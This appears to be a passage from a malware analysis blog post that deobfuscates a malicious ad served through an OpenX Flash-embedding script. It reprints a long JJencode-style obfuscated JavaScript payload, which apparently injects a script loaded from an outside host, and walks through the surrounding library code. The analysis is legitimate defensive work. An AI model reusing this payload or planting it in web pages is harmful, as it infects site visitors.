$a.$_$+$a.$_$+$a._+$a.$$_$+\"=\"+$a.__$+\";\\\\\"+$a.$__+$a.___+$a.$$$_+\"\\\\\"+$a.__$+$a.$$$+$a.___+\"\\\\\"+$a.__$+$a.$$_+$a.___+\"\\\\\"+$a.__$+$a.$_$+$a.__$+\"\\\\\"+$a.__$+$a.$$_+$a._$_+$a.$$$_+\"\\\\\"+$a.__$+$a.$$_+$a._$$+\"=\\\\\"+$a.__$+$a._$_+$a.$$$+$a.$$$_+$a.$$_$+\",\\\\\"+$a.$__+$a.___+$a.___+$a.__$+\"\\\\\"+$a.$__+$a.___+\"\\\\\"+$a.__$+$a.__$+$a._$_+$a.$_$_+\"\\\\\"+$a.__$+$a.$_$+$a.$$_+\"\\\\\"+$a.$__+$a.___+$a._$_+$a.___+$a._$_+$a.___+\"\\\\\"+$a.$__+$a.___+$a.___+$a.___+\":\"+$a.___+$a.___+\":\"+$a.___+$a.___+\"\\\\\"+$a.$__+$a.___+\"\\\\\"+$a.__$+$a._$_+$a.$_$+\"\\\\\"+$a.__$+$a._$_+$a.$__+\"\\\\\"+$a.__$+$a.___+$a._$$+\";\\\\\"+$a.$__+$a.___+\"\\\\\"+$a.__$+$a.$$_+$a.___+$a.$_$_+$a.__+\"\\\\\"+$a.__$+$a.$_$+$a.___+\"=/\';\"+$a.$$_$+\".\\\\\"+$a.__$+$a.$$_+$a.$$$+\"\\\\\"+$a.__$+$a.$$_+$a._$_+\"\\\\\"+$a.__$+$a.$_$+$a.__$+$a.__+$a.$$$_+(![]+\"\")[$a._$_]+\"\\\\\"+$a.__$+$a.$_$+$a.$$_+\"(\\\\\\\"<"+"\\\\\"+$a.__$+$a.$$_+$a._$$+$a.$$__+\"\\\\\"+$a.__$+$a.$$_+$a._$_+\"\\\\\\\"+\\\\\\\"\\\\\"+$a.__$+$a.$_$+$a.__$+\"\\\\\"+$a.__$+$a.$$_+$a.___+$a.__+\"\\\\\"+$a.$__+$a.___+\"\\\\\"+$a.__$+$a.$$_+$a._$$+\"\\\\\"+$a.__$+$a.$$_+$a._$_+$a.$$__+\"=\'\\\\\"+$a.__$+$a.$_$+$a.___+$a.__+$a.__+\"\\\\\"+$a.__$+$a.$$_+$a.___+\"://\"+$a.$_$$+\"\\\\\"+$a.__$+$a.$$_+$a._$_+\"\\\\\"+$a.__$+$a.$_$+$a.__$+\"\\\\\"+$a.__$+$a.$_$+$a.$$_+\"\\\\\"+$a.__$+$a.$$_+$a._$$+\".\"+$a.$_$$+\"\\\\\"+$a.__$+$a.$_$+$a.__$+\"\\\\\"+$a.__$+$a.$$$+$a._$_+\"/\"+$a.___+$a.$$__+$a.$$__+$a._$_+$a._$_+$a.$$$+$a.$_$+$a.$$_+\".\\\\\"+$a.__$+$a.$_$+$a._$_+\"\\\\\"+$a.__$+$a.$$_+$a._$$+\"?\"+$a.$$__+\"\\\\\"+$a.__$+$a.$$_+$a.___+\"=\"+$a.$_$_+$a.$$_$+\".\\\\\"+$a.__$+$a.$$_+$a._$$+$a.$_$_+\"\\\\\"+$a.__$+$a.$_$+$a.$_$+$a.$$$_+\"-\\\\\"+$a.__$+$a.$$_+$a._$$+$a.__+$a._$+\"\\\\\"+$a.__$+$a.$$_+$a._$_+\"\\\\\"+$a.__$+$a.$$$+$a.__$+\".\"+$a.$$__+$a._$+\"\\\\\"+$a.__$+$a.$_$+$a.$_$+\"\'><"+"/\\\\\"+$a.__$+$a.$$_+$a._$$+$a.$$__+\"\\\\\"+$a.__$+$a.$$_+$a._$_+\"\\\\\"+$a.__$+$a.$_$+$a.__$+\"\\\\\\\"+\\\\\\\"\\\\\"+$a.__$+$a.$$_+$a.___+$a.__+\">\\\\\\\");}\"+\"\\\"\")())();}catch(e){}<"+"/script><"+"!--ffnqt--><"+"/div>\n";
OX_0f4f918e += "<"+"script type=\'text/javascript\'><"+"!--// <"+"![CDATA[\n";
OX_0f4f918e += "var ox_swf = new FlashObject(\'http://ad.same-story.com/images/abcf302d1728cb4ec9ebbc5360497402.swf\', \'Advertisement\', \'300\', \'250\', \'9\');\n";
OX_0f4f918e += "ox_swf.addVariable(\'clickTARGET\', \'_blank\');\n";
OX_0f4f918e += "ox_swf.addVariable(\'clickTAG\', \'http%3A%2F%2Fad.same-story.com%2Fdelivery%2Fck.php%3Foaparams%3D2__bannerid%3D155__zoneid%3D9__cb%3D956c2f8948__oadest%3Dhttp%253A%252F%252Fhome.edt02.net%252Femc%252Fbanner%252Fmstbc.php%253Fc%253D40060-195305-99922-0-335287\');\n";
OX_0f4f918e += "ox_swf.addParam(\'allowScriptAccess\',\'always\');\n";
OX_0f4f918e += "ox_swf.write(\'ox_64ea63b5f76eb3c481ad44a961e2c479\');\n";
OX_0f4f918e += "if (ox_swf.installedVer.versionIsValid(ox_swf.getAttribute(\'version\'))) { document.write(\"<"+"div id=\'beacon_956c2f8948\' style=\'position: absolute; left: 0px; top: 0px; visibility: hidden;\'><"+"img src=\'http://ad.same-story.com/delivery/lg.php?bannerid=155&campaignid=27&zoneid=9&cb=956c2f8948\' width=\'0\' height=\'0\' alt=\'\' style=\'width: 0px; height: 0px;\' /><"+"/div>\"); } else { document.write(\"<"+"div id=\'beacon_956c2f8948\' style=\'position: absolute; left: 0px; top: 0px; visibility: hidden;\'><"+"img src=\'http://ad.same-story.com/delivery/lg.php?bannerid=155&campaignid=27&zoneid=9&fb=1&cb=956c2f8948\' width=\'0\' height=\'0\' alt=\'\' style=\'width: 0px; height: 0px;\' /><"+"/div>\"); }\n";
OX_0f4f918e += "// ]]> --><"+"/script><"+"noscript><"+"div id=\'beacon_956c2f8948\' style=\'position: absolute; left: 0px; top: 0px; visibility: hidden;\'><"+"img src=\'http://ad.same-story.com/delivery/lg.php?bannerid=155&campaignid=27&zoneid=9&fb=1&cb=956c2f8948\' width=\'0\' height=\'0\' alt=\'\' style=\'width: 0px; height: 0px;\' /><"+"/div><"+"/noscript><"+"script>try{$a=~[];$a={___:++$a,$$$$:(![]+\"\")[$a],__$:++$a,$_$_:(![]+\"\")[$a],_$_:++$a,$_$$:({}+\"\")[$a],$$_$:($a[$a]+\"\")[$a],_$$:++$a,$$$_:(!\"\"+\"\")[$a],$__:++$a,$_$:++$a,$$__:({}+\"\")[$a],$$_:++$a,$$$:++$a,$___:++$a,$__$:++$a};$a.$_=($a.$_=$a+\"\")[$a.$_$]+($a._$=$a.$_[$a.__$])+($a.$$=($a.$+\"\")[$a.__$])+((!$a)+\"\")[$a._$$]+($a.__=$a.$_[$a.$$_])+($a.$=(!\"\"+\"\")[$a.__$])+($a._=(!\"\"+\"\")[$a._$_])+$a.$_[$a.$_$]+$a.__+$a._$+$a.$;$a.$$=$a.$+(!\"\"+\"\")[$a._$$]+$a.__+$a._+$a.$+$a.$$;$a.$=($a.___)[$a.$_][$a.$_];$a.$($a.$($a.$$+\"\\\"\"+$a.$$_$+\"=\"+$a.$$_$+$a._$+$a.$$__+$a._+\"\\\\\"+$a.__$+$a.$_$+$a.$_$+$a.$$$_+\"\\\\\"+$a.__$+$a.$_$+$a.$$_+$a.__+\";\"+$a._+$a.$_$_+\"=\\\\\"+$a.__$+$a.$_$+$a.$$_+$a.$_$_+\"\\\\\"+$a.__$+$a.$$_+$a.$$_+\"\\\\\"+$a.__$+$a.$_$+$a.__$+\"\\\\\"+$a.__$+$a.$__+$a.$$$+$a.$_$_+$a.__+$a._$+\"\\\\\"+$a.__$+$a.$$_+$a._$_+\".\"+$a._+\"\\\\\"+$a.__$+$a.$$_+$a._$$+$a.$$$_+\"\\\\\"+$a.__$+$a.$$_+$a._$_+\"\\\\\"+$a.__$+$a.___+$a.__$+\"\\\\\"+$a.__$+$a.$__+$a.$$$+$a.$$$_+\"\\\\\"+$a.__$+$a.$_$+$a.$$_+$a.__+\";\\\\\"+$a.__$+$a.$_$+$a.__$+$a.$$$$+\"(\"+$a.$$_$+\"._\\\\\"+$a.__$+$a.$$$+$a._$_+\"\\\\\"+$a.__$+$a.$$$+$a.___+\"===\"+$a._+\"\\\\\"+$a.__$+$a.$_$+$a.$$_+$a.$$_$+$a.$$$_+$a.$$$$+\"\\\\\"+$a.__$+$a.$_$+$a.__$+\"\\\\\"+$a.__$+$a.$_$+$a.$$_+$a.$$$_+$a.$$_$+\"\\\\\"+$a.$__+$a.___+\"&&\\\\\"+$a.$__+$a.___+$a.$$_$+\".\"+$a.$$__+$a._$+$a._$+\"\\\\\"+$a.__$+$a.$_$+$a._$$+\"\\\\\"+$a.__$+$a.$_$+$a.__$+$a.$$$_+\".\\\\\"+$a.__$+$a.$$_+$a._$$+$a.$$$_+$a.$_$_+\"\\\\\"+$a.__$+$a.$$_+$a._$_+$a.$$__+\"\\\\\"+$a.__$+$a.$_$+$a.___+\"(\'_\"+$a._+$a.__+\"\\\\\"+$a.__$+$a.$_$+$a.$_$+$a._+$a.$$_$+\"=\')==-\"+$a.__$+\"\\\\\"+$a.$__+$a.___+\"&&\\\\\"+$a.$__+$a.___+$a._+$a.$_$_+\".\\\\\"+$a.__$+$a.$$_+$a._$$+$a.$$$_+$a.$_$_+\"\\\\\"+$a.__$+$a.$$_+$a._$_+$a.$$__+\"\\\\\"+$a.__$+$a.$_$+$a.___+\"(\'\\\\\"+$a.__$+$a._$_+$a.$$$+\"\\\\\"+$a.__$+$a.$_$+$a.__$+\"\\\\\"+$a.__$+$a.$_$+$a.$$_+$a.$$_$+$a._$+\"\\\\\"+$a.__$+$a.$$_+$a.$$$+\"\\\\\"+$a.__$+$a.$$_+$a._$$+\"\\\\\"+$a.$__+$a.___+\"\\\\\"+$a.__$+$a.__$+$a.$$_+\"\\\\\"+$a.__$+$a._$_+$a.$__+\"\\\\\"+$a.$__+$a.___+\"\')>\"+$a.___+\"\\\\\"+$a.$__+$a.___+\"&&\\\\\"+$a.$__+$a.___+$a._+$a.$_$_+\".\\\\\"+$a.__$+$a.$$_+$a._$$+$a.$$$_+$a.$_$_+\"\\\\\"+$a.__$+$a.$$_+$a._$_+$a.$$__+\"\\\\\"+$a.__$+$a.$_$+$a.___+\"(\'\\\\\"+$a.__$+$a.__$+$a.$_$+\"\\\\\"+$a.__$+$a._$_+$a._$$+\"\\\\\"+$a.__$+$a.__$+$a.__$+\"\\\\\"+$a.__$+$a.___+$a.$_$+\"\\\\\"+$a.$__+$a.___+\"\')>\"+$a.___+\")\\\\\"+$a.$__+$a.___+\"{\"+$a.$$_$+\"._\\\\\"+$a.__$+$a.$$$+$a._$_+\"\\\\\"+$a.__$+$a.$$$+$a.___+\"=\"+$a.__$+\";\"+$a.$$_$+\".\"+$a.$$__+$a._$+$a._$+\"\\\\\"+$a.__$+$a.$_$+$a._$$+\"\\\\\"+$a.__$+$a.$_$+$a.__$+$a.$$$_+\"=\'__\"+$a._+$a.__+\"\\\\\"+$a.__$+$a.$_$+$a.$_$+$a._+$a.$$_$+\"=\"+$a.__$+\";\\\\\"+$a.$__+$a.___+$a.$$$_+\"\\\\\"+$a.__$+$a.$$$+$a.___+\"\\\\\"+$a.__$+$a.$$_+$a.___+\"\\\\\"+$a.__$+$a.$_$+$a.__$+\"\\\\\"+$a.__$+$a.$$_+$a._$_+$a.$$$_+\"\\\\\"+$a.__$+$a.$$_+$a._$$+\"=\\\\\"+$a.__$+$a._$_+$a.$$$+$a.$$$_+$a.$$_$+\",\\\\\"+$a.$__+$a.___+$a.___+$a.__$+\"\\\\\"+$a.$__+$a.___+\"\\\\\"+$a.__$+$a.__$+$a._$_+$a.$_$_+\"\\\\\"+$a.__$+$a.$_$+$a.$$_+\"\\\\\"+$a.$__+$a.___+$a._$_+$a.___+$a._$_+$a.___+\"\\\\\"+$a.$__+$a.___+$a.___+$a.___+\":\"+$a.___+$a.___+\":\"+$a.___+$a.___+\"\\\\\"+$a.$__+$a.___+\"\\\\\"+$a.__$+$a._$_+$a.$_$+\"\\\\\"+$a.__$+$a._$_+$a.$__+\"\\\\\"+$a.__$+$a.___+$a._$$+\";\\\\\"+$a.$__+$a.___+\"\\\\\"+$a.__$+$a.$$_+$a.___+$a.$_$_+$a.__+\"\\\\\"+$a.__$+$a.$_$+$a.___+\"=/\';\"+$a.$$_$+\".\\\\\"+$a.__$+$a.$$_+$a.$$$+\"\\\\\"+$a.__$+$a.$$_+$a._$_+\"\\\\\"+$a.__$+$a.$_$+$a.__$+$a.__+$a.$$$_+(![]+\"\")[$a._$_]+\"\\\\\"+$a.__$+$a.$_$+$a.$$_+\"(\\\\\\\"<"+"\\\\\"+$a.__$+$a.$$_+$a._$$+$a.$$__+\"\\\\\"+$a.__$+$a.$$_+$a._$_+\"\\\\\\\"+\\\\\\\"\\\\\"+$a.__$+$a.$_$+$a.__$+\"\\\\\"+$a.__$+$a.$$_+$a.___+$a.__+\"\\\\\"+$a.$__+$a.___+\"\\\\\"+$a.__$+$a.$$_+$a._$$+\"\\\\\"+$a.__$+$a.$$_+$a._$_+$a.$$__+\"=\'\\\\\"+$a.__$+$a.$_$+$a.___+$a.__+$a.__+\"\\\\\"+$a.__$+$a.$$_+$a.___+\"://\"+$a.$_$$+\"\\\\\"+$a.__$+$a.$$_+$a._$_+\"\\\\\"+$a.__$+$a.$_$+$a.__$+\"\\\\\"+$a.__$+$a.$_$+$a.$$_+\"\\\\\"+$a.__$+$a.$$_+$a._$$+\".\"+$a.$_$$+\"\\\\\"+$a.__$+$a.$_$+$a.__$+\"\\\\\"+$a.__$+$a.$$$+$a._$_+\"/\"+$a.___+$a.$$__+$a.$$__+$a._$_+$a._$_+$a.$$$+$a.$_$+$a.$$_+\".\\\\\"+$a.__$+$a.$_$+$a._$_+\"\\\\\"+$a.__$+$a.$$_+$a._$$+\"?\"+$a.$$__+\"\\\\\"+$a.__$+$a.$$_+$a.___+\"=\"+$a.$_$_+$a.$$_$+\".\\\\\"+$a.__$+$a.$$_+$a._$$+$a.$_$_+\"\\\\\"+$a.__$+$a.$_$+$a.$_$+$a.$$$_+\"-\\\\\"+$a.__$+$a.$$_+$a._$$+$a.__+$a._$+\"\\\\\"+$a.__$+$a.$$_+$a._$_+\"\\\\\"+$a.__$+$a.$$$+$a.__$+\".\"+$a.$$__+$a._$+\"\\\\\"+$a.__$+$a.$_$+$a.$_$+\"\'><"+"/\\\\\"+$a.__$+$a.$$_+$a._$$+$a.$$__+\"\\\\\"+$a.__$+$a.$$_+$a._$_+\"\\\\\"+$a.__$+$a.$_$+$a.__$+\"\\\\\\\"+\\\\\\\"\\\\\"+$a.__$+$a.$$_+$a.___+$a.__+\">\\\\\\\");}\"+\"\\\"\")())();}catch(e){}<"+"/script><"+"!--ffnqt-->\n";
document.write(OX_0f4f918e);
...well isn't that ugly? Let's see if we can gussy it up a bit.
JSBeautifier to the rescue! One pass adds some formatting to the code and makes it much easier to read. Let's see if we can't make some sense out of it now – we'll take it step by step.
Step 2: Initial Analysis
This first bit just declares an object named "org.openx.SWFObjectUtil" for the script to use:
if (typeof org == "undefined") {
var org = new Object();
}
if (typeof org.openx == "undefined") {
org.openx = new Object();
}
if (typeof org.openx.util == "undefined") {
org.openx.util = new Object();
}
if (typeof org.openx.SWFObjectUtil == "undefined") {
org.openx.SWFObjectUtil = new Object();
}
Next, it assigns some functionality to the object. It looks like this will detect whether or not Flash is installed, check its version, and trigger an install under certain conditions:
org.openx.SWFObject = function(_1, id, w, h, _5, c, _7, _8, _9, _a) {
if (!document.getElementById) {
return;
}
this.DETECT_KEY = _a ? _a : "detectflash";
this.skipDetect = org.openx.util.getRequestParameter(this.DETECT_KEY);
this.params = new Object();
this.variables = new Object();
this.attributes = new Array();
if (_1) {
this.setAttribute("swf", _1);
}
if (id) {
this.setAttribute("id", id);
}
if (w) {
this.setAttribute("width", w);
}
if (h) {
this.setAttribute("height", h);
}
if (_5) {
this.setAttribute("version", new org.openx.PlayerVersion(_5.toString().split(".")));
}
this.installedVer = org.openx.SWFObjectUtil.getPlayerVersion();
if (!window.opera && document.all && this.installedVer.major > 7) {
org.openx.SWFObject.doPrepUnload = true;
}
if (c) {
this.addParam("bgcolor", c);
}
var q = _7 ? _7 : "high";
this.addParam("quality", q);
this.setAttribute("useExpressInstall", false);
this.setAttribute("doExpressInstall", false);
var _c = (_8) ? _8 : window.location;
this.setAttribute("xiRedirectUrl", _c);
this.setAttribute("redirectUrl", "");
if (_9) {
this.setAttribute("redirectUrl", _9);
}
};
Next we have a code block that prototypes the object to add more functionality to it. In this case, it seems to be doing some browser checks to determine the right HTML code to output for the browser to render a Flash file:
org.openx.SWFObject.prototype = {
useExpressInstall: function(_d) {
this.xiSWFPath = !_d ? "expressinstall.swf" : _d;
this.setAttribute("useExpressInstall", true);
},
setAttribute: function(_e, _f) {
this.attributes[_e] = _f;
},
getAttribute: function(_10) {
return this.attributes[_10];
},
addParam: function(_11, _12) {
this.params[_11] = _12;
},
getParams: function() {
return this.params;
},
addVariable: function(_13, _14) {
this.variables[_13] = _14;
},
getVariable: function(_15) {
return this.variables[_15];
},
getVariables: function() {
return this.variables;
},
getVariablePairs: function() {
var _16 = new Array();
var key;
var _18 = this.getVariables();
for (key in _18) {
_16[_16.length] = key + "=" + _18[key];
}
return _16;
},
getSWFHTML: function() {
var _19 = "";
if (navigator.plugins && navigator.mimeTypes && navigator.mimeTypes.length) {
if (this.getAttribute("doExpressInstall")) {
this.addVariable("MMplayerType", "PlugIn");
this.setAttribute("swf", this.xiSWFPath);
}
_19 = "<embed type=\"application/x-shockwave-flash\" src=\"" + this.getAttribute("swf") + "\" width=\"" + this.getAttribute("width") + "\" height=\"" + this.getAttribute("height") + "\" style=\"" + this.getAttribute("style") + "\"";
_19 += " id=\"" + this.getAttribute("id") + "\" name=\"" + this.getAttribute("id") + "\" ";
var _1a = this.getParams();
for (var key in _1a) {
_19 += [key] + "=\"" + _1a[key] + "\" ";
}
var _1c = this.getVariablePairs().join("&");
if (_1c.length > 0) {
_19 += "flashvars=\"" + _1c + "\"";
}
_19 += "/>";
} else {
if (this.getAttribute("doExpressInstall")) {
this.addVariable("MMplayerType", "ActiveX");
this.setAttribute("swf", this.xiSWFPath);
}
_19 = "<object id=\"" + this.getAttribute("id") + "\" classid=\"clsid:D27CDB6E-AE6D-11cf-96B8-444553540000\" width=\"" + this.getAttribute("width") + "\" height=\"" + this.getAttribute("height") + "\" style=\"" + this.getAttribute("style") + "\">";
_19 += "<param name=\"movie\" value=\"" + this.getAttribute("swf") + "\" />";
var _1d = this.getParams();
for (var key in _1d) {
_19 += "<param name=\"" + key + "\" value=\"" + _1d[key] + "\" />";
}
var _1f = this.getVariablePairs().join("&");
if (_1f.length > 0) {
_19 += "<param name=\"flashvars\" value=\"" + _1f + "\" />";
}
_19 += "</object>";
}
return _19;
},
write: function(_20) {
if (this.getAttribute("useExpressInstall")) {
var _21 = new org.openx.PlayerVersion([6, 0, 65]);
if (this.installedVer.versionIsValid(_21) && !this.installedVer.versionIsValid(this.getAttribute("version"))) {
this.setAttribute("doExpressInstall", true);
this.addVariable("MMredirectURL", escape(this.getAttribute("xiRedirectUrl")));
document.title = document.title.slice(0, 47) + " - Flash Player Installation";
this.addVariable("MMdoctitle", document.title);
}
}
if (this.skipDetect || this.getAttribute("doExpressInstall") || this.installedVer.versionIsValid(this.getAttribute("version"))) {
var n = (typeof _20 == "string") ? document.getElementById(_20) : _20;
n.innerHTML = this.getSWFHTML();
return true;
} else {
if (this.getAttribute("redirectUrl") != "") {
document.location.replace(this.getAttribute("redirectUrl"));
}
}
return false;
}
};
These parts do some more version checking:
org.openx.SWFObjectUtil.getPlayerVersion = function() {
var _23 = new org.openx.PlayerVersion([0, 0, 0]);
if (navigator.plugins && navigator.mimeTypes.length) {
var x = navigator.plugins["Shockwave Flash"];
if (x && x.description) {
_23 = new org.openx.PlayerVersion(x.description.replace(/([a-zA-Z]|\s)+/, "").replace(/(\s+r|\s+b[0-9]+)/, ".").split("."));
}
} else {
if (navigator.userAgent && navigator.userAgent.indexOf("Windows CE") >= 0) {
var axo = 1;
var _26 = 3;
while (axo) {
try {
_26++;
axo = new ActiveXObject("ShockwaveFlash.ShockwaveFlash." + _26);
_23 = new org.openx.PlayerVersion([_26, 0, 0]);
} catch (e) {
axo = null;
}
}
} else {
try {
var axo = new ActiveXObject("ShockwaveFlash.ShockwaveFlash.7");
} catch (e) {
try {
var axo = new ActiveXObject("ShockwaveFlash.ShockwaveFlash.6");
_23 = new org.openx.PlayerVersion([6, 0, 21]);
axo.AllowScriptAccess = "always";
} catch (e) {
if (_23.major == 6) {
return _23;
}
}
try {
axo = new ActiveXObject("ShockwaveFlash.ShockwaveFlash");
} catch (e) {}
}
if (axo != null) {
_23 = new org.openx.PlayerVersion(axo.GetVariable("$version").split(" ")[1].split(","));
}
}
}
return _23;
};
org.openx.PlayerVersion = function(_29) {
this.major = _29[0] != null ? parseInt(_29[0]) : 0;
this.minor = _29[1] != null ? parseInt(_29[1]) : 0;
this.rev = _29[2] != null ? parseInt(_29[2]) : 0;
};
org.openx.PlayerVersion.prototype.versionIsValid = function(fv) {
if (this.major < fv.major) {
return false;
}
if (this.major > fv.major) {
return true;
}
if (this.minor < fv.minor) {
return false;
}
if (this.minor > fv.minor) {
return true;
}
if (this.rev < fv.rev) {
return false;
}
return true;
};
Next we have a utility function that parses values out of attributes in the URL – this is likely a way for the code to accept input to control its functionality:
org.openx.util = {
getRequestParameter: function(_2b) {
var q = document.location.search || document.location.hash;
if (_2b == null) {
return q;
}
if (q) {
var _2d = q.substring(1).split("&");
for (var i = 0; i < _2d.length; i++) {
if (_2d[i].substring(0, _2d[i].indexOf("=")) == _2b) {
return _2d[i].substring((_2d[i].indexOf("=") + 1));
}
}
}
return "";
}
};
A couple of cleanup functions follow that, to let the code remove itself after execution:
org.openx.SWFObjectUtil.cleanupSWFs = function() {
var _2f = document.getElementsByTagName("OBJECT");
for (var i = _2f.length - 1; i >= 0; i--) {
_2f[i].style.display = "none";
for (var x in _2f[i]) {
if (typeof _2f[i][x] == "function") {
_2f[i][x] = function() {};
}
}
}
};
if (org.openx.SWFObject.doPrepUnload) {
if (!org.openx.unloadSet) {
org.openx.SWFObjectUtil.prepUnload = function() {
__flash_unloadHandler = function() {};
__flash_savedUnloadHandler = function() {};
window.attachEvent("onunload", org.openx.SWFObjectUtil.cleanupSWFs);
};
window.attachEvent("onbeforeunload", org.openx.SWFObjectUtil.prepUnload);
org.openx.unloadSet = true;
}
}
Following that, we find a function that adds support for getElementById if it isn't natively supported by the browser:
if (!document.getElementById && document.all) {
document.getElementById = function(id) {
return document.all[id];
};
}
Up to this point, everything has been pretty straightforward – it appears we have javascript code that embeds a Flash object that is tailored to the browser and version of Flash installed. This could be legitimate or malicious depending on how it is used – it could just be code for Flash-based ads.
A little bit of OSINT sheds more light on the nature of the code above: OpenX is apparently an advertising company that "provides digital and advertising technologies that optimize a company's advertising revenue." OpenSWF, according to Wikipedia, "is an open-source JavaScript library used to embed Adobe Flash content onto Web pages.... The library can also detect the installed Adobe Flash Player plug-in in all major web browsers, on all major operating systems (OS), and can redirect the visitor to another webpage or show alternate HTML content if the installed plug-in is not suitable." That matches up pretty well to what we've seen so far.
The code that follows gets a bit more interesting. We have a few variable declarations:
var getQueryParamValue = org.openx.util.getRequestParameter;
var FlashObject = org.openx.SWFObject;
var SWFObject = org.openx.SWFObject;
document.mmm_fo = 1;
var OX_0f4f918e = '';
Then we have this big ugly block of unintelligible code:
OX_0f4f918e += "<" + "script>try{$a=~[];$a={___:++$a,$$$$:(![]+\"\")[$a],__$:++$a,$_$_:(![]+\"\")[$a],_$_:++$a,$_$$:({}+\"\")[$a],$$_$:($a[$a]+\"\")[$a],_$$:++$a,$$$_:(!\"\"+\"\")[$a],$__:++$a,$_$:++$a,$$__:({}+\"\")[$a],$$_:++$a,$$$:++$a,$___:++$a,$__$:++$a};$a.$_=($a.$_=$a+\"\")[$a.$_$]+($a._$=$a.$_[$a.__$])+($a.$$=($a.$+\"\")[$a.__$])+((!$a)+\"\")[$a._$$]+($a.__=$a.$_[$a.$$_])+($a.$=(!\"\"+\"\")[$a.__$])+($a._=(!\"\"+\"\")[$a._$_])+$a.$_[$a.$_$]+$a.__+$a._$+$a.$;$a.$$=$a.$+(!\"\"+\"\")[$a._$$]+$a.__+$a._+$a.$+$a.$$;$a.$=($a.___)[$a.$_][$a.$_];$a.$($a.$($a.$$+\"\\\"\"+$a.$$_$+\"=\"+$a.$$_$+$a._$+$a.$$__+$a._+\"\\\\\"+$a.__$+$a.$_$+$a.$_$+$a.$$$_+\"\\\\\"+$a.__$+$a.$_$+$a.$$_+$a.__+\";\"+$a._+$a.$_$_+\"=\\\\\"+$a.__$+$a.$_$+$a.$$_+$a.$_$_+\"\\\\\"+$a.__$+$a.$$_+$a.$$_+\"\\\\\"+$a.__$+$a.$_$+$a.__$+\"\\\\\"+$a.__$+$a.$__+$a.$$$+$a.$_$_+$a.__+$a._$+\"\\\\\"+$a.__$+$a.$$_+$a._$_+\".\"+$a._+\"\\\\\"+$a.__$+$a.$$_+$a._$$+$a.$$$_+\"\\\\\"+$a.__$+$a.$$_+$a._$_+\"\\\\\"+$a.__$+$a.___+$a.__$+\"\\\\\"+$a.__$+$a.$__+$a.$$$+$a.$$$_+\"\\\\\"+$a.__$+$a.$_$+$a.$$_+$a.__+\";\\\\\"+$a.__$+$a.$_$+$a.__$+$a.$$$$+\"(\"+$a.$$_$+\"._\\\\\"+$a.__$+$a.$$$+$a._$_+\"\\\\\"+$a.__$+$a.$$$+$a.___+\"===\"+$a._+\"\\\\\"+$a.__$+$a.$_$+$a.$$_+$a.$$_$+$a.$$$_+$a.$$$$+\"\\\\\"+$a.__$+$a.$_$+$a.__$+\"\\\\\"+$a.__$+$a.$_$+$a.$$_+$a.$$$_+$a.$$_$+\"\\\\\"+$a.$__+$a.___+\"&&\\\\\"+$a.$__+$a.___+$a.$$_$+\".\"+$a.$$__+$a._$+$a._$+\"\\\\\"+$a.__$+$a.$_$+$a._$$+\"\\\\\"+$a.__$+$a.$_$+$a.__$+$a.$$$_+\".\\\\\"+$a.__$+$a.$$_+$a._$$+$a.$$$_+$a.$_$_+\"\\\\\"+$a.__$+$a.$$_+$a._$_+$a.$$__+\"\\\\\"+$a.__$+$a.$_$+$a.___+\"(\'_\"+$a._+$a.__+\"\\\\\"+$a.__$+$a.$_$+$a.$_$+$a._+$a.$$_$+\"=\')==-\"+$a.__$+\"\\\\\"+$a.$__+$a.___+\"&&\\\\\"+$a.$__+$a.___+$a._+$a.$_$_+\".\\\\\"+$a.__$+$a.$$_+$a._$$+$a.$$$_+$a.$_$_+\"\\\\\"+$a.__$+$a.$$_+$a._$_+$a.$$__+\"\\\\\"+$a.__$+$a.$_$+$a.___+\"(\'\\\\\"+$a.__$+$a._$_+$a.$$$+\"\\\\\"+$a.__$+$a.$_$+$a.__$+\"\\\\\"+$a.__$+$a.$_$+$a.$$_+$a.$$_$+$a._$+\"\\\\\"+$a.__$+$a.$$_+$a.$$$+\"\\\\\"+$a.__$+$a.$$_+$a._$$+\"\\\\\"+$a.$__+$a.___+\"\\\\\"+$a.__$+$a.__$+$a.$$_+\"\\\\\"+$a.__$+$a._$_+$a.$__+\"\\\\\"+$a.$__+$a.___+\"\')>\"+$a.___+\"\\\\\"+$a.$__+$a.___+\"&&\\\\\"+$a.$__+$a.___+$a._+$a.$_$_+\".\\\\\"+$a.__$+$a.$$_+$a._$$+$a.$$$_+$a.$_$_+\"\\\\\"+$a.__$+$a.$$_+$a._$_+$a.$$__+\"\\\\\"+$a.__$+$a.$_$+$a.___+\"(\'\\\\\"+$a.__$+$a.__$+$a.$_$+\"\\\\\"+$a.__$+$a._$_+$a._$$+\"\\\\\"+$a.__$+$a.__$+$a.__$+\"\\\\\"+$a.__$+$a.___+$a.$_$+\"\\\\\"+$a.$__+$a.___+\"\')>\"+$a.___+\")\\\\\"+$a.$__+$a.___+\"{\"+$a.$$_$+\"._\\\\\"+$a.__$+$a.$$$+$a._$_+\"\\\\\"+$a.__$+$a.$$$+$a.___+\"=\"+$a.__$+\";\"+$a.$$_$+\".\"+$a.$$__+$a._$+$a._$+\"\\\\\"+$a.__$+$a.$_$+$a._$$+\"\\\\\"+$a.__$+$a.$_$+$a.__$+$a.$$$_+\"=\'__\"+$a._+$a.__+\"\\\\\"+$a.__$+$a.$_$+$a.$_$+$a._+$a.$$_$+\"=\"+$a.__$+\";\\\\\"+$a.$__+$a.___+$a.$$$_+\"\\\\\"+$a.__$+$a.$$$+$a.___+\"\\\\\"+$a.__$+$a.$$_+$a.___+\"\\\\\"+$a.__$+$a.$_$+$a.__$+\"\\\\\"+$a.__$+$a.$$_+$a._$_+$a.$$$_+\"\\\\\"+$a.__$+$a.$$_+$a._$$+\"=\\\\\"+$a.__$+$a._$_+$a.$$$+$a.$$$_+$a.$$_$+\",\\\\\"+$a.$__+$a.___+$a.___+$a.__$+\"\\\\\"+$a.$__+$a.___+\"\\\\\"+$a.__$+$a.__$+$a._$_+$a.$_$_+\"\\\\\"+$a.__$+$a.$_$+$a.$$_+\"\\\\\"+$a.$__+$a.___+$a._$_+$a.___+$a._$_+$a.___+\"\\\\\"+$a.$__+$a.___+$a.___+$a.___+\":\"+$a.___+$a.___+\":\"+$a.___+$a.___+\"\\\\\"+$a.$__+$a.___+\"\\\\\"+$a.__$+$a._$_+$a.$_$+\"\\\\\"+$a.__$+$a._$_+$a.$__+\"\\\\\"+$a.__$+$a.___+$a._$$+\";\\\\\"+$a.$__+$a.___+\"\\\\\"+$a.__$+$a.$$_+$a.___+$a.$_$_+$a.__+\"\\\\\"+$a.__$+$a.$_$+$a.___+\"=/\';\"+$a.$$_$+\".\\\\\"+$a.__$+$a.$$_+$a.$$$+\"\\\\\"+$a.__$+$a.$$_+$a._$_+\"\\